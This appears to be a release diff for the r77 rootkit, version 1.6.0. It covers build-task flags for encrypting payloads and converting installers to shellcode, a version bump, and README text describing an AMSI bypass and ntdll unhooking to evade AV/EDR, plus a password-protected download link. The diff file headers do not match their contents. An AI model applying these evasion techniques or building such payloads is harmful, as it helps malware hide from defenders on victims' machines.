1.6.0

Author: bytecode77

Diff for: $Docs/Documentation.docx

@@ -15,7 +15,6 @@ namespace BuildTask
 	/// <para>-compress: Compress file</para>
 	/// <para>-encrypt: Encrypt file</para>
 	/// <para>-toshellcode: Extracts an executable file's .text section</para>
-	/// <para>-r77service: Write R77_SERVICE_SIGNATURE to r77 header</para>
 	/// <para>-r77helper: Write R77_HELPER_SIGNATURE to r77 header</para>
 	/// <para>-shellcodeinstaller: Converts Install.exe to Install.shellcode</para>
 	/// </summary>
@@ -39,7 +38,6 @@ public static int Main(string[] args)
 				if (args.Contains("-compress")) file = Compress(file);
 				if (args.Contains("-encrypt")) file = Encrypt(file);
 				if (args.Contains("-toshellcode")) file = ExtractShellCode(file);
-				if (args.Contains("-r77service")) file = R77Signature(file, R77Const.R77ServiceSignature);
 				if (args.Contains("-r77helper")) file = R77Signature(file, R77Const.R77HelperSignature);
 
 				File.WriteAllBytes(args[0], file);

Diff for: BuildTask/BuildTask.cs

@@ -1,5 +1,5 @@
 using System.Reflection;
 
-[assembly: AssemblyVersion("1.5.5")]
-[assembly: AssemblyFileVersion("1.5.5")]
+[assembly: AssemblyVersion("1.6.0")]
+[assembly: AssemblyFileVersion("1.6.0")]
 [assembly: AssemblyCopyright("© bytecode77, 2025.")]

Diff for: Global/GlobalAssemblyInfo.cs

@@ -68,7 +68,7 @@ This graph shows each stage from the execution of the installer all the way down
 Several AV and EDR evasion techniques are in use:
 
 - **AMSI bypass:** The PowerShell inline script disables AMSI by patching `amsi.dll!AmsiScanBuffer` to always return `AMSI_RESULT_CLEAN`. Polymorphism is used to evade signature detection of the AMSI bypass.
-- **DLL unhooking:** Since EDR solutions monitor API calls by hooking `ntdll.dll`, these hooks need to be removed by loading a fresh copy of `ntdll.dll` from disk and restoring the original section. Otherwise, process hollowing would be detected.
+- **DLL unhooking:** Since EDR solutions monitor API calls by hooking `ntdll.dll`, these hooks need to be removed by loading a fresh copy of `ntdll.dll` from disk and restoring the original section. Otherwise, process injection would be detected.
 
 ## Test environment
 
@@ -82,7 +82,7 @@ Please read the [technical documentation](https://docs.bytecode77.com/r77-rootki
 
 ## Downloads
 
-[![](https://bytecode77.com/public/fileicons/zip.png) r77 Rootkit 1.5.5.zip](https://downloads.bytecode77.com/r77Rootkit%201.5.5.zip)
+[![](https://bytecode77.com/public/fileicons/zip.png) r77 Rootkit 1.6.0.zip](https://downloads.bytecode77.com/r77Rootkit%201.6.0.zip)
 (**ZIP Password:** bytecode77)<br />
 [![](https://bytecode77.com/public/fileicons/pdf.png) Technical Documentation](https://docs.bytecode77.com/r77-rootkit/Technical%20Documentation.pdf)